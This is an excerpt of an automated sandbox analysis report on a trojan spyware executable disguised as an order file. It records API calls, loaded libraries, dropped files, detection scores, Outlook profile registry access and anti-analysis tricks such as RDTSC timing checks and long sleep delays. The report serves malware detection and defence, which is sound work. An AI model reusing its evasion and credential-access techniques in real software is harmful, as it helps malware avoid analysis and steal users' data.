            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8BC2A4_2_3AE8BC2A
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE860214_2_3AE86021
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8BC384_2_3AE8BC38
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE860304_2_3AE86030
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE830084_2_3AE83008
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8FC184_2_3AE8FC18
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8DC194_2_3AE8DC19
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE800114_2_3AE80011
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE815E84_2_3AE815E8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8C9E84_2_3AE8C9E8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE815F84_2_3AE815F8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8E9C84_2_3AE8E9C8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8E9D84_2_3AE8E9D8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8C9D84_2_3AE8C9D8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE811904_2_3AE81190
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE80D484_2_3AE80D48
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8E5484_2_3AE8E548
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8C5484_2_3AE8C548
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8C5584_2_3AE8C558
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8A9284_2_3AE8A928
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8A9384_2_3AE8A938
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE8E5384_2_3AE8E538
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_3AE80D394_2_3AE80D39
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: String function: 00402C41 appears 51 times
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007787000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ORDER 20240986 OA.exe
            Source: ORDER 20240986 OA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/5@4/4
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_004046FF GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberryJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeMutant created: NULL
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile created: C:\Users\user\AppData\Local\Temp\nsr11BF.tmpJump to behavior
            Source: ORDER 20240986 OA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: ORDER 20240986 OA.exeReversingLabs: Detection: 44%
            Source: ORDER 20240986 OA.exeVirustotal: Detection: 33%
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile read: C:\Users\user\Desktop\ORDER 20240986 OA.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe"
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe"
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: ORDER 20240986 OA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2287809032.0000000003873000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2287296673.000000000083C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ORDER 20240986 OA.exe PID: 7316, type: MEMORYSTR
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_6FBB1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FBB1B63
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_6FBB2FD0 push eax; ret 0_2_6FBB2FFE
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_00159C30 push esp; retf 0017h4_2_00159D55
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile created: C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeAPI/Special instruction interceptor: Address: 3C78CCE
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeAPI/Special instruction interceptor: Address: 2A18CCE
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeRDTSC instruction interceptor: First address: 3C164A6 second address: 3C164A6 instructions: 0x00000000 rdtsc 0x00000002 cmp bl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F6DB1459D15h 0x00000008 inc ebp 0x00000009 cmp ax, dx 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeRDTSC instruction interceptor: First address: 29B64A6 second address: 29B64A6 instructions: 0x00000000 rdtsc 0x00000002 cmp bl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F6DB133B325h 0x00000008 inc ebp 0x00000009 cmp ax, dx 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeMemory allocated: 37BD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeMemory allocated: 37B00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599639Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599516Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599406Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598141Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597813Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596247Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595344Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595125Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 595016Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594891Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594766Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594547Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594437Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeThread delayed: delay time: 594328Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeWindow / User API: threadDelayed 8654Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeWindow / User API: threadDelayed 1183Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -33204139332677172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8080Thread sleep count: 8654 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8080Thread sleep count: 1183 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -599639s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -599516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -599406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -599297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -598703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -598594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076Thread sleep time: -598469s >= -30000sJump to behavior
